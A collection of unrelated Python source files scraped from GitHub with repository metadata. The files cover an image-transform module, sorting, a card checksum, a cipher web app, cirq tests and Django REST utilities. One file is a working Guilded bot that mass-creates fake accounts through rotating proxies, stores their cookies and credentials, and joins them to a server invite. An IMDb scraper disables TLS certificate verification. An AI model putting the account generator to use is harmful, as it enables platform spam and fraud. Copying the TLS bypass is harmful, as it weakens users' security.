bool or None\n \"\"\"\n session = db.session()\n\n try:\n company_name = self._body.get(\"company_name\")\n company_tag = self._body.get(\"company_tag\")\n\n result, code = self.has_company_tags(company_name=company_name, company_tag=company_tag)\n\n # There is no request body company name in database\n if result is None:\n return None, \"EMPTY\"\n\n # Already company has request body company tag\n if result is True and code is True:\n return None, \"ALREADY_EXIST\"\n\n result, tags = tag_converter(tag=company_tag)\n\n if not result:\n raise ValueError(tags)\n\n # select row\n row = session.query(Companies).filter((Companies.company_ko == company_name) |\n (Companies.company_en == company_name) |\n (Companies.company_ja == company_name)).first()\n\n tag_ko = \"|\".join(row.tag_ko.split(\"|\") + [tags[\"ko\"]]) if row.tag_ko else tags[\"ko\"]\n tag_ja = \"|\".join(row.tag_ja.split(\"|\") + [tags[\"ja\"]]) if row.tag_ja else tags[\"ja\"]\n tag_en = \"|\".join(row.tag_en.split(\"|\") + [tags[\"en\"]]) if row.tag_en else tags[\"en\"]\n\n # update row\n session.query(Companies).filter((Companies.company_ko == company_name) |\n (Companies.company_en == company_name) |\n (Companies.company_ja == company_name))\\\n .update({\n \"tag_ko\": tag_ko,\n \"tag_ja\": tag_ja,\n \"tag_en\": tag_en\n })\n\n except Exception as e:\n current_app.logger.error(e)\n session.rollback()\n return False, \"BAD_REQUEST\"\n\n session.commit()\n session.close()\n return True, \"SUCCESS\"\n\n def delete_company_tags(self) -> (bool or None, str):\n \"\"\"\n delete company tags\n :return: bool, String\n \"\"\"\n session = db.session()\n\n try:\n company_name = self._param.get(\"company_name\")\n company_tag = self._param.get(\"company_tag\")\n\n result, code = self.has_company_tags(company_name=company_name, company_tag=company_tag)\n\n if result is None:\n return None, \"EMPTY\"\n\n if result is False and code is True:\n return None, \"ALREADY_NOT_EXIST\"\n\n result, tags = tag_converter(tag=company_tag)\n\n if not result:\n raise ValueError(tags)\n\n row = session.query(Companies).filter((Companies.company_ko == company_name) |\n (Companies.company_en == company_name) |\n (Companies.company_ja == company_name)).first()\n\n tag_ko = \"|\".join(sorted(set(row.tag_ko.split(\"|\")) - {tags[\"ko\"]})) if row.tag_ko else tags[\"ko\"]\n tag_ja = \"|\".join(sorted(set(row.tag_ja.split(\"|\")) - {tags[\"ja\"]})) if row.tag_ja else tags[\"ja\"]\n tag_en = \"|\".join(sorted(set(row.tag_en.split(\"|\")) - {tags[\"en\"]})) if row.tag_en else tags[\"en\"]\n\n # update row\n session.query(Companies).filter((Companies.company_ko == company_name) |\n (Companies.company_en == company_name) |\n (Companies.company_ja == company_name)) \\\n .update({\n \"tag_ko\": tag_ko,\n \"tag_ja\": tag_ja,\n \"tag_en\": tag_en\n })\n\n except Exception as e:\n current_app.logger.error(e)\n session.rollback()\n return False, \"BAD_REQUEST\"\n\n session.commit()\n session.close()\n return True, \"SUCCESS\"","repo_name":"JeongHM/wants","sub_path":"services/internals/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13750284048","text":"# vim: ft=python fileencoding=utf-8 sw=4 et sts=4\n\n\"\"\"*imtransform - transformations such as rotate and flip*.\"\"\"\n\nimport functools\nimport math\nfrom typing import Optional\n\nfrom vimiv.qt.core import Qt, QRect, QSize, QObject, Signal\nfrom vimiv.qt.gui import QTransform, 
QPixmap\n\nfrom vimiv import api\nfrom vimiv.utils import log\n\n\n_logger = log.module_logger(__name__)\n\n\ndef register_transform_command(**kwargs):\n \"\"\"Wrap commands.register to ensure image is editable and apply transformations.\"\"\"\n\n def decorator(func):\n @functools.wraps(func)\n def inner(self, *args, **kwargs):\n # Only used to wrap methods of transform\n # pylint: disable=protected-access\n self._ensure_editable()\n func(self, *args, **kwargs)\n self.apply()\n\n return api.commands.register(mode=api.modes.IMAGE, edit=True, **kwargs)(inner)\n\n return decorator\n\n\nclass Transform(QTransform):\n \"\"\"Apply transformations to an image.\n\n Provides the commands related to transformation such as rotate and flip and is used\n to apply these transformations to the pixmap given by the handler.\n\n Attributes:\n _current: Class to access the currently displayed pixmap.\n _original: The original, untransformed, pixmap.\n\n Signals:\n transformed: Emitted with the transformed pixmap upon changes.\n \"\"\"\n\n class Signals(QObject):\n \"\"\"Signals for transformed required as QTransform is not a QObject.\"\"\"\n\n transformed = Signal(QPixmap)\n\n _signals = Signals()\n transformed = _signals.transformed\n\n @api.objreg.register\n def __init__(self, current_pixmap):\n super().__init__()\n self._current = current_pixmap\n self._original = None\n\n @property\n def current(self):\n return self._current.pixmap\n\n @property\n def original(self):\n return self._original\n\n @original.setter\n def original(self, pixmap):\n self._original = pixmap\n self.reset()\n\n @property\n def angle(self) -> float:\n \"\"\"Current rotation angle in degrees.\"\"\"\n x, y = self.map(1.0, 0.0)\n return (math.atan2(y, x) / math.pi * 180) % 360\n\n @api.keybindings.register(\"<\", \"rotate --counter-clockwise\", mode=api.modes.IMAGE)\n @api.keybindings.register(\">\", \"rotate\", mode=api.modes.IMAGE)\n @register_transform_command(name=\"rotate\")\n def rotate_command(self, counter_clockwise: bool = False, count: int = 1):\n \"\"\"Rotate the image.\n\n **syntax:** ``:rotate [--counter-clockwise]``\n\n optional arguments:\n * ``--counter-clockwise``: Rotate counter clockwise.\n\n **count:** multiplier\n \"\"\"\n angle = 90 * count\n self.rotate(-angle if counter_clockwise else angle)\n\n @api.keybindings.register(\"_\", \"flip --vertical\", mode=api.modes.IMAGE)\n @api.keybindings.register(\"|\", \"flip\", mode=api.modes.IMAGE)\n @register_transform_command()\n def flip(self, vertical: bool = False):\n \"\"\"Flip the image.\n\n **syntax:** ``:flip [--vertical]``\n\n optional arguments:\n * ``--vertical``: Flip image vertically instead of horizontally.\n \"\"\"\n # Change direction if image is rotated by 90/270 degrees\n if self.angle % 180:\n vertical = not vertical\n if vertical:\n self.scale(1, -1)\n else:\n self.scale(-1, 1)\n\n @register_transform_command()\n def resize(self, width: int, height: Optional[int]):\n \"\"\"Resize the original image to a new size.\n\n **syntax:** ``:resize width [height]``\n\n positional arguments:\n * ``width``: Width in pixels to resize the image to.\n * ``height``: Height in pixels to resize the image to. 
If not given, the\n aspectratio is preserved.\n \"\"\"\n dx = width / self.current.width()\n dy = dx if height is None else height / self.current.height()\n self.scale(dx, dy)\n\n @register_transform_command()\n def rescale(self, dx: float, dy: Optional[float]):\n \"\"\"Rescale the original image to a new size.\n\n **syntax:** ``:rescale dx [dy]``\n\n positional arguments:\n * ``dx``: Factor in x direction to scale the image by.\n * ``dy``: Factor in y direction to scale the image by. If not given, the\n aspectratio is preserved.\n \"\"\"\n dy = dy if dy is not None else dx\n self.scale(dx, dy)\n\n def apply(self):\n \"\"\"Apply all transformations to the original pixmap.\"\"\"\n self._apply(\n self.original.transformed(\n self, mode=Qt.TransformationMode.SmoothTransformation\n )\n )\n\n def straighten(self, *, angle: int, original_size: QSize):\n \"\"\"Straighten the original image.\n\n This rotates the image by the total angle and crops the valid, axis-aligned\n rectangle from the rotated image.\n\n Args:\n angle: Rotation angle to straighten the original image by.\n original_size: Size of the original unstraightened image.\n \"\"\"\n self.rotate(angle)\n transformed = self.original.transformed(\n self, mode=Qt.TransformationMode.SmoothTransformation\n )\n rect = self.largest_rect_in_rotated(\n original=original_size, rotated=transformed.size(), angle=angle\n )\n self._apply(transformed.copy(rect))\n\n def crop(self, rect):\n self._apply(self.current.copy(rect))\n\n def _apply(self, transformed):\n \"\"\"Check the transformed pixmap for validity and apply it to the handler.\"\"\"\n if transformed.isNull():\n raise api.commands.CommandError(\n \"Error transforming image, ignoring transformation.\\n\"\n \"Is the resulting image too large? Zero?.\"\n )\n self.transformed.emit(transformed)\n\n def _ensure_editable(self):\n if not self._current.editable:\n raise api.commands.CommandError(\"File format does not support transform\")\n\n @property\n def changed(self):\n \"\"\"True if transformations have been applied.\"\"\"\n if self.current.rect().isNull():\n return False\n transformed = not self.isIdentity()\n if self._original is None:\n return transformed\n cropped = self.current.rect() != self._original.rect()\n return transformed or cropped\n\n @property\n def matrix(self):\n \"\"\"Tuple of matrix elements defining the current transformation matrix.\"\"\"\n # fmt: off\n return (\n self.m11(), self.m12(), self.m13(),\n self.m21(), self.m22(), self.m23(),\n self.m31(), self.m32(), self.m33(),\n )\n # fmt: on\n\n @property\n def size(self) -> QSize:\n \"\"\"Size of the transformed image.\"\"\"\n return self.current.size()\n\n @register_transform_command()\n def undo_transformations(self):\n \"\"\"Undo any transformation applied to the current image.\"\"\"\n self.reset()\n self.transformed.emit(self.original)\n\n @classmethod\n def largest_rect_in_rotated(\n cls, *, original: QSize, rotated: QSize, angle: float\n ) -> QRect:\n \"\"\"Return largest possible axis-aligned rectangle in rotated rectangle.\n\n See https://stackoverflow.com/a/16778797 for the implementation details.\n\n Args:\n original: Size of the original (unrotated) rectangle.\n rotated: Size of the rotated and padded rectangle (larger than original).\n angle: Rotation angle in degrees.\n Returns:\n Rectangle with the coordinates and size within the rotated rectangle.\n \"\"\"\n # Not beautiful, but also not much nicer if we refactor this into multiple\n # functions\n # pylint: disable=too-many-locals\n rad = angle / 180 * 
math.pi\n        is_portrait = original.height() > original.width()\n        short = original.width() if is_portrait else original.height()\n        long = original.height() if is_portrait else original.width()\n        sin_a = abs(math.sin(rad))\n        cos_a = abs(math.cos(rad))\n\n        if short <= 2.0 * sin_a * cos_a * long or abs(sin_a - cos_a) < 1e-10:\n            s = 0.5 * short\n            wr, hr = (s / cos_a, s / sin_a) if is_portrait else (s / sin_a, s / cos_a)\n        else:\n            cos_2a = cos_a**2 - sin_a**2\n            wr = (original.width() * cos_a - original.height() * sin_a) / cos_2a\n            hr = (original.height() * cos_a - original.width() * sin_a) / cos_2a\n\n        x = (rotated.width() - wr) // 2\n        y = (rotated.height() - hr) // 2\n\n        return QRect(int(x), int(y), int(wr), int(hr))\n","repo_name":"karlch/vimiv-qt","sub_path":"vimiv/imutils/imtransform.py","file_name":"imtransform.py","file_ext":"py","file_size_in_byte":8688,"program_lang":"python","lang":"en","doc_type":"code","stars":162,"dataset":"github-code","pt":"77"}
{"seq_id":"26579472331","text":"List = [10, 58, 46, 5, 32, 20]\r\n\r\nn = len(List)\r\n\r\nprint('Your list before sorting:', List)\r\n\r\nfor k in range(1, n):  # the outer loop runs n - 1 = 5 iterations since we start from 1\r\n    for j in range(n - k):  # n - k is 5 on the first iteration and shrinks by 1 each pass\r\n        if List[j] > List[j + 1]:  # if List[j] is greater than the next element\r\n            temp = List[j]  # store the value of index[j] in a var called temp\r\n            List[j] = List[j + 1]  # overwrite the index[j] with the one next to it\r\n            List[j + 1] = temp  # then overwrite index[j+1] with the value stored in temp\r\nprint('Your sorted list is', List)\r\n","repo_name":"AErenzo/Python_course_programs","sub_path":"bubbleSort.py","file_name":"bubbleSort.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"6710053759","text":"i,u=int,input\nn=range(i(u()))\ng=[list(map(i, u().split()))for _ in n]\nfor m in n:\n    for s in n:\n        for t in n:g[s][t]=g[s][t]|(g[s][m]&g[m][t])\nfor l in g:print(*l)\n\n# n = range(int(input()))\n# graph = [list(map(int, input().split())) for _ in n]\n# for m in n:\n#     for s in n:\n#         for t in n:\n#             graph[s][t] = graph[s][t] or (graph[s][m] and graph[m][t])\n# for l in graph:\n#     print(*l)","repo_name":"hun-jae/189Python","sub_path":"week09/11403_경로찾기/김재헌.py","file_name":"김재헌.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"71671764729","text":"from bs4 import BeautifulSoup\nimport urllib.request\nimport ssl\n\n\ndef open_link(link):\n    ssl._create_default_https_context = ssl._create_unverified_context\n    with urllib.request.urlopen(link) as url:\n        return url.read()\n\n\nclass ImdbRate:\n\n    @staticmethod\n    def call(imdb_id):\n        if imdb_id[:2] == 'tt':\n            imdb_id = imdb_id[2:]\n\n        return ImdbRate.get_rate(imdb_id)\n\n    @staticmethod\n    def get_rate(imdb_id):\n\n        if imdb_id is None:\n            return None, None, None\n\n        try:\n            imdb_link = \"https://www.imdb.com/title/tt\" + str(imdb_id)\n            imdb_page = BeautifulSoup(open_link(imdb_link), \"html.parser\")\n\n            aggregate_rating = imdb_page.select('div[itemprop=\"aggregateRating\"]')\n            if len(aggregate_rating) == 0:\n                return imdb_id, None, None\n\n            rating_value = aggregate_rating[0].select('span[itemprop=\"ratingValue\"]')\n            if len(rating_value) == 0:\n                return imdb_id, None, None\n\n            imbd_rate = rating_value[0].text\n            imbd_rate = float(imbd_rate.replace(',', '.'))\n\n            rating_count = 
aggregate_rating[0].select('span[itemprop=\"ratingCount\"]')\n if len(rating_count) == 0:\n return imdb_id, imbd_rate, None\n\n imbd_rates_count = rating_count[0].text\n imbd_rates_count = imbd_rates_count.replace(' ', '')\n imbd_rates_count = int(imbd_rates_count.replace(',', ''))\n\n return imdb_id, imbd_rate, imbd_rates_count\n\n except urllib.error.HTTPError:\n return imdb_id, None, None\n","repo_name":"kedrisse/cinerank_api","sub_path":"app/services/rates/imdb_rate.py","file_name":"imdb_rate.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35665633279","text":"import os\nimport random\nimport requests\nimport binascii\nimport threading\n\nfrom colorama import Fore\n\ninvite = \"ENZ4d0jE\"\ncreated = 0\n\ndef get_rstr(lenght: int) -> str:\n return str(binascii.b2a_hex(os.urandom(lenght)).decode('utf-8'))\n\n\ndef Gen():\n try:\n global created\n proxy = random.choice(open('proxies.txt', 'r').read().splitlines())\n proxies = {'http': f'http://{proxy}', 'https': f'http://{proxy}'}\n\n name = ''.join(random.choices('poiuytrewqlkjhgfdsamnbvcxz098765431', k=7))\n email = ''.join(random.choices('poiuytrewqlkjhgfdsamnbvcxz098765431', k=8)) + '@gmail.com'\n password = ''.join(random.choices('poiuytrewqlkjhgfdsamnbvcxz098765431', k=12))\n headers = {\n 'authority' : 'www.guilded.gg',\n 'accept' : 'application/json, text/javascript, */*; q=0.01',\n 'accept-language' : 'en-GB,en;q=0.9',\n 'content-type' : 'application/json',\n 'guilded-client-id' : f'{get_rstr(8)}-{get_rstr(4)}-{get_rstr(4)}-{get_rstr(4)}-{get_rstr(12)}',\n 'guilded-stag' : get_rstr(32),\n 'guilded-viewer-platform': 'desktop',\n 'origin' : 'https://www.guilded.gg',\n 'referer' : 'https://www.guilded.gg/',\n 'sec-ch-ua' : '\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"',\n 'sec-ch-ua-mobile' : '?0',\n 'sec-ch-ua-platform' : '\"Windows\"',\n 'sec-fetch-dest' : 'empty',\n 'sec-fetch-mode' : 'cors',\n 'sec-fetch-site' : 'same-origin',\n 'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36',\n 'x-requested-with' : 'XMLHttpRequest',\n }\n\n json = {\n 'extraInfo': {\n 'registrationSource': 'search',\n 'platform': 'desktop',\n },\n 'name' : name,\n 'email' : email,\n 'password': password,\n 'fullName': name,\n }\n\n response = requests.post('https://www.guilded.gg/api/users?type=email', json=json, headers=headers, proxies=proxies)\n if response.status_code == 200:\n created += 1\n print(f\"{Fore.BLUE}[ {Fore.GREEN}+ {Fore.BLUE}]{Fore.RESET} Generated ({created})\")\n hmac = response.cookies['hmac_signed_session']\n with open('cookies.txt', 'a') as cookieOpen:\n cookieOpen.write(f'{hmac}\\n')\n with open('accounts.txt', 'a') as accountOpen:\n accountOpen.write(f'{email}:{name}:{password}\\n')\n\n __headers__ = {\n 'authority': 'www.guilded.gg',\n 'accept': 'application/json, text/javascript, */*; q=0.01',\n 'accept-language': 'en-GB,en-US;q=0.9,en;q=0.8',\n 'content-type': 'application/json',\n 'cookie': f'hmac_signed_session={hmac}',\n 'guilded-client-id': f'{get_rstr(8)}-{get_rstr(4)}-{get_rstr(4)}-{get_rstr(4)}-{get_rstr(12)}',\n 'guilded-viewer-platform': 'desktop',\n 'origin': 'https://www.guilded.gg',\n 'referer': 'https://www.guilded.gg/',\n 'sec-ch-ua': '\"Google Chrome\";v=\"107\", \"Chromium\";v=\"107\", \"Not=A?Brand\";v=\"24\"',\n 'sec-ch-ua-mobile': '?0',\n 'sec-ch-ua-platform': '\"Windows\"',\n 'sec-fetch-dest': 
'empty',\n 'sec-fetch-mode': 'cors',\n 'sec-fetch-site': 'same-origin',\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36',\n 'x-requested-with': 'XMLHttpRequest',\n }\n\n params_ = {'teamId': f'{invite}','includeLandingChannel': 'true',}\n\n __json = {'type': 'consume',}\n response = requests.put(f'https://www.guilded.gg/api/invites/{invite}', params=params_, headers=__headers__, json=__json, proxies=proxies)\n\n else:\n print(f\"{Fore.BLUE}[ {Fore.RED}x {Fore.BLUE}]{Fore.RESET} Error\")\n except Exception as e:\n pass\n\n\nos.system('cls')\nthread = int(input(\"threads: \"))\nif __name__ == '__main__':\n for i in range(thread):\n threading.Thread(target=Gen).start()\n","repo_name":"Hazza3100/Guilded-Account-Creator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"29020367636","text":"import sqlite3\nimport sys\n\n\ndef create_table(database_name: str, table_name: str):\n try:\n sqlite_connection = sqlite3.connect(database_name)\n cursor = sqlite_connection.cursor()\n print(\"connect success\")\n cursor.execute(f'''CREATE TABLE IF NOT EXISTS {table_name}\n (EMPID INT, PASSPORT TEXT, FIRSTNAME TEXT, LASTNAME TEXT, \n GENDER INT, BIRTHDAY TEXT, NATIONALITY TEXT, HIRED TEXT,\n DEPT TEXT, POSITION TEXT, STATUS INT, REGION TEXT)''')\n sqlite_connection.commit()\n cursor.close()\n\n except sqlite3.Error as error:\n print(\"create table failed\", error)\n\n finally:\n if sqlite_connection:\n sqlite_connection.close()\n print(\"database.close\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 3:\n create_table(database_name=sys.argv[1], table_name=sys.argv[2])\n else:\n print(\"Please insert param\")\n\n","repo_name":"ummdev/-backwizard-dev-mountain","sub_path":"src/create_table.py","file_name":"create_table.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19321580643","text":"def sum_digits(n) :\r\n s = 0\r\n while n > 0 :\r\n t = n % 10\r\n s += t\r\n n = int(n / 10)\r\n return s\r\nn = input(\"Enter the credit card number : \")\r\nsumn = 0\r\nfor i in range(len(n) - 2, -1, -2) :\r\n t = int(n[i]) * 2\r\n if t >= 10 :\r\n t = sum_digits(t)\r\n sumn += t\r\nfor i in range(len(n) - 1, -1, -2) :\r\n sumn += int(n[i])\r\nif sumn % 10 == 0 :\r\n print(\"\\nVALID\")\r\nelse :\r\n print(\"\\nINVALID\")","repo_name":"VimaleshCT/ATMcard","sub_path":"atmcard.py","file_name":"atmcard.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13112390945","text":"import math\nfrom flask import Flask, render_template, request\napp=Flask(__name__)\n\n@app.route('/enc',methods=['GET','POST'])\ndef enc():\n\tif request.method=='POST':\n\t\tptext=request.form['ptext']\n\t\tpkey=request.form['pkey']\n\t\tdef encryptMessage(ptext): \n\t\t cipher = \"\" \n\t\t \n\t\t # track key indices \n\t\t k_indx = 0\n\t\t \n\t\t msg_len = float(len(ptext)) \n\t\t msg_lst = list(ptext) \n\t\t key_lst = sorted(list(pkey)) \n\t\t \n\t\t # calculate column of the matrix \n\t\t col = len(pkey) \n\t\t \n\t\t # calculate maximum row of the matrix \n\t\t row = int(math.ceil(msg_len / col)) \n\t\t \n\t\t # add the padding character '_' in empty \n\t\t # the empty cell of the matix \n\t\t fill_null = 
int((row * col) - msg_len) \n\t\t msg_lst.extend('_' * fill_null) \n\t\t \n\t\t # create Matrix and insert message and \n\t\t # padding characters row-wise \n\t\t matrix = [msg_lst[i: i + col] \n\t\t for i in range(0, len(msg_lst), col)] \n\t\t \n\t\t # read matrix column-wise using key \n\t\t for _ in range(col): \n\t\t curr_idx = pkey.index(key_lst[k_indx]) \n\t\t cipher += ''.join([row[curr_idx] \n\t\t for row in matrix]) \n\t\t k_indx += 1\n\t\t \n\t\t return cipher\n\t\tcipher=encryptMessage(ptext)\n\t\t\n\t\treturn render_template('cip.html', cipher=cipher)\n\n\treturn render_template('enc.html')\n@app.route('/dec',methods=['GET','POST'])\ndef dec():\n\tif request.method=='POST':\n\t\tctext=request.form['ctext']\n\t\tckey=request.form['ckey']\n\t\tdef decryptMessage(ctext): \n\t\t msg = \"\" \n\t\t \n\t\t # track key indices \n\t\t k_indx = 0\n\t\t \n\t\t # track msg indices \n\t\t msg_indx = 0\n\t\t msg_len = float(len(ctext)) \n\t\t msg_lst = list(ctext) \n\t\t \n\t\t # calculate column of the matrix \n\t\t col = len(ckey) \n\t\t \n\t\t # calculate maximum row of the matrix \n\t\t row = int(math.ceil(msg_len / col)) \n\t\t \n\t\t # convert key into list and sort \n\t\t # alphabetically so we can access \n\t\t # each character by its alphabetical position. \n\t\t key_lst = sorted(list(ckey)) \n\t\t \n\t\t # create an empty matrix to \n\t\t # store deciphered message \n\t\t dec_cipher = [] \n\t\t for _ in range(row): \n\t\t dec_cipher += [[None] * col] \n\t\t \n\t\t # Arrange the matrix column wise according \n\t\t # to permutation order by adding into new matrix \n\t\t for _ in range(col): \n\t\t curr_idx = ckey.index(key_lst[k_indx]) \n\t\t \n\t\t for j in range(row): \n\t\t dec_cipher[j][curr_idx] = msg_lst[msg_indx] \n\t\t msg_indx += 1\n\t\t k_indx += 1\n\t\t \n\t\t # convert decrypted msg matrix into a string \n\t\t try: \n\t\t msg = ''.join(sum(dec_cipher, [])) \n\t\t except TypeError: \n\t\t raise TypeError(\"This program cannot\", \n\t\t \"handle repeating words.\") \n\t\t \n\t\t null_count = msg.count('_') \n\t\t \n\t\t if null_count > 0: \n\t\t return msg[: -null_count] \n\t\t \n\t\t return msg \n\t\tplain=decryptMessage(ctext)\n\t\treturn render_template('pl.html', plain=plain)\n\t\n\treturn render_template('dec.html')\n\nif __name__==\"__main__\":\n\tapp.run()\n","repo_name":"ganesh140/cnsassignment","sub_path":"cns/trcip.py","file_name":"trcip.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22177604756","text":"from typing import Optional, Sequence, Union, Collection, Tuple, List\n\nimport pytest\n\nimport numpy as np\n\nimport cirq\nfrom cirq.ops import control_values as cv\n\n\nclass GoodGate(cirq.EigenGate, cirq.testing.SingleQubitGate):\n def _eigen_components(self) -> List[Tuple[float, np.ndarray]]: # pragma: no cover\n return [(0, np.diag([1, 0])), (1, np.diag([0, 1]))]\n\n\nclass BadGateOperation(cirq.GateOperation):\n def controlled_by(\n self,\n *control_qubits: 'cirq.Qid',\n control_values: Optional[\n Union[cv.AbstractControlValues, Sequence[Union[int, Collection[int]]]]\n ] = None,\n ) -> 'cirq.Operation':\n return cirq.ControlledOperation(control_qubits, self, control_values)\n\n\nclass BadGate(cirq.EigenGate, cirq.testing.SingleQubitGate):\n def _eigen_components(self) -> List[Tuple[float, np.ndarray]]:\n return [(0, np.diag([1, 0])), (1, np.diag([0, 1]))]\n\n def on(self, *qubits: 'cirq.Qid') -> 'cirq.Operation':\n return BadGateOperation(self, 
list(qubits))\n\n def controlled(\n self,\n num_controls: Optional[int] = None,\n control_values: Optional[\n Union[cv.AbstractControlValues, Sequence[Union[int, Collection[int]]]]\n ] = None,\n control_qid_shape: Optional[Tuple[int, ...]] = None,\n ) -> 'cirq.Gate':\n ret = super().controlled(num_controls, control_values, control_qid_shape)\n if num_controls == 1 and control_values is None:\n return cirq.CZPowGate(exponent=self._exponent, global_shift=self._global_shift)\n return ret\n\n\ndef test_assert_controlled_and_controlled_by_identical():\n cirq.testing.assert_controlled_and_controlled_by_identical(GoodGate())\n\n with pytest.raises(AssertionError):\n cirq.testing.assert_controlled_and_controlled_by_identical(BadGate())\n\n with pytest.raises(ValueError, match=r'len\\(num_controls\\) != len\\(control_values\\)'):\n cirq.testing.assert_controlled_and_controlled_by_identical(\n GoodGate(), num_controls=[1, 2], control_values=[(1,)]\n )\n\n with pytest.raises(ValueError, match=r'len\\(control_values\\[1\\]\\) != num_controls\\[1\\]'):\n cirq.testing.assert_controlled_and_controlled_by_identical(\n GoodGate(), num_controls=[1, 2], control_values=[(1,), (1, 1, 1)]\n )\n\n\ndef test_assert_controlled_unitary_consistent():\n cirq.testing.assert_controlled_and_controlled_by_identical(\n GoodGate(exponent=0.5, global_shift=1 / 3)\n )\n\n with pytest.raises(AssertionError):\n cirq.testing.assert_controlled_and_controlled_by_identical(\n BadGate(exponent=0.5, global_shift=1 / 3)\n )\n","repo_name":"quantumlib/Cirq","sub_path":"cirq-core/cirq/testing/consistent_controlled_gate_op_test.py","file_name":"consistent_controlled_gate_op_test.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","stars":3974,"dataset":"github-code","pt":"77"} +{"seq_id":"32563735104","text":"\"\"\"\nDjango Rest Framework utility classes\n=====================================\n\nAnything in this package is used along with the Django Rest Framework\nto provide for our use cases within our application.\n\"\"\"\nfrom datetime import datetime\n\nimport uuid\nimport warnings\nfrom calendar import timegm\nfrom django.conf import settings\nfrom django.utils.translation import get_language_from_request\nfrom djangorestframework_camel_case.render import CamelCaseJSONRenderer\nfrom rest_framework import pagination, permissions\nfrom rest_framework.permissions import BasePermission\nfrom rest_framework.response import Response\nfrom rest_framework.utils.urls import replace_query_param\nfrom rest_framework_jwt.compat import get_username_field, get_username\nfrom rest_framework_jwt.settings import api_settings\n\nfrom utils.mime import FULL_FORMAT, SUMMARY_FORMAT\nfrom .http import LinkHeaderField, LinkHeaderRel\n\n\nclass LinkHeaderPagination(pagination.PageNumberPagination):\n \"\"\" Replaces the default pagination classes, provided by DRF, with one\n that returns pagination data as part of the HTTP Link header.\n\n The RFC can be found `here`_\n\n In addition, a second, custom HTTP header is included: X-Total-Results,\n which will be a numeric count of the total number of objects across all\n pages.\n \"\"\"\n page_size_query_param = 'per_page'\n max_page_size = 250\n\n def get_first_url(self):\n if not self.page.has_previous():\n return None\n url = self.request.build_absolute_uri()\n return replace_query_param(url, self.page_query_param, 1)\n\n def get_last_url(self):\n if not self.page.has_next():\n return None\n url = self.request.build_absolute_uri()\n return 
replace_query_param(\n url, self.page_query_param, self.page.paginator.num_pages)\n\n def get_paginated_response(self, data):\n\n next_url = self.get_next_link()\n previous_url = self.get_previous_link()\n\n link_parts = []\n\n # if we have a next page, then we know we have a last, as well.\n if next_url is not None:\n link_parts.extend([\n LinkHeaderField(\n url=next_url,\n rel=LinkHeaderRel.next,\n title=str(self.page.number + 1)),\n LinkHeaderField(\n url=self.get_last_url(),\n rel=LinkHeaderRel.last,\n title=self.page.paginator.num_pages),\n ])\n\n # if we have a previous page, then we know we have a first page, too.\n if previous_url is not None:\n link_parts.extend([\n LinkHeaderField(\n url=previous_url,\n rel=LinkHeaderRel.prev,\n title=str(self.page.number - 1)),\n LinkHeaderField(\n url=self.get_first_url(),\n rel=LinkHeaderRel.first,\n title=str(1)),\n ])\n\n headers = {\n 'Link': \", \".join(\n [str(link) for link in link_parts]) if link_parts else {},\n 'X-Total-Results': self.page.paginator.count,\n }\n return Response(data, headers=headers)\n\n\ndef convert_env_boolean(env_value: str) -> bool:\n \"\"\" Converts an envvar string into a boolean. Rules: true/True/TRUE/t/T/1 -> True; All others false\n\n >>> convert_env_boolean('t')\n True\n\n >>> convert_env_boolean('1')\n True\n\n >>> convert_env_boolean('0')\n False\n \"\"\"\n return env_value.lower() in ['true', '1', 't']\n\n\nclass SoftDeletableListViewMixin:\n \"\"\" Same as a 'ListViewMixin', but instead, by default, filters out\n models which have an 'is_active' attribute set to false.\n\n If the 'include_inactive=true', parameter is passed in the query string,\n then all models (regardless of 'is_active' attribute), will be returned.\n \"\"\"\n def get_queryset(self):\n if convert_env_boolean(self.request.query_params.get('include_inactive', '')):\n return self.queryset\n else:\n return self.queryset.filter(is_active=True)\n\n\nclass IsAuthenticatedOrOptions(BasePermission):\n \"\"\" Allows access only to authenticated users, unless the request is\n for the http OPTIONS method, then the user is directly allowed.\n \"\"\"\n def has_permission(self, request, view):\n if request.method == 'OPTIONS':\n return True\n else:\n return request.user and request.user.is_authenticated()\n\n\nclass IsOwner(BasePermission):\n def has_permission(self, request, view):\n if view.queryset.get().user == request.user:\n return True\n\n\nclass SummarizedListMixin:\n def get_serializer_class(self):\n if self.request.method == 'GET':\n if hasattr(self, 'summary_serializer_class'):\n return self.summary_serializer_class\n else:\n return create_summary_serializer(self.serializer_class)\n else:\n return self.serializer_class\n\n\ndef create_summary_serializer(serializer_cls):\n \"\"\" Creates a 'summary serializer' for a given standard serializer class.\n\n This is intended for list endpoints, and shortens the serializer class to only send back a 'title' and an 'href'\n\n :param serializer_cls:\n :return:\n \"\"\"\n class SummarySerializer(serializer_cls):\n class Meta(serializer_cls.Meta):\n fields = getattr(\n serializer_cls.Meta,\n 'summary_fields',\n ('href', 'name')\n )\n return SummarySerializer\n\n\nclass SummaryCamelCaseRenderer(CamelCaseJSONRenderer):\n 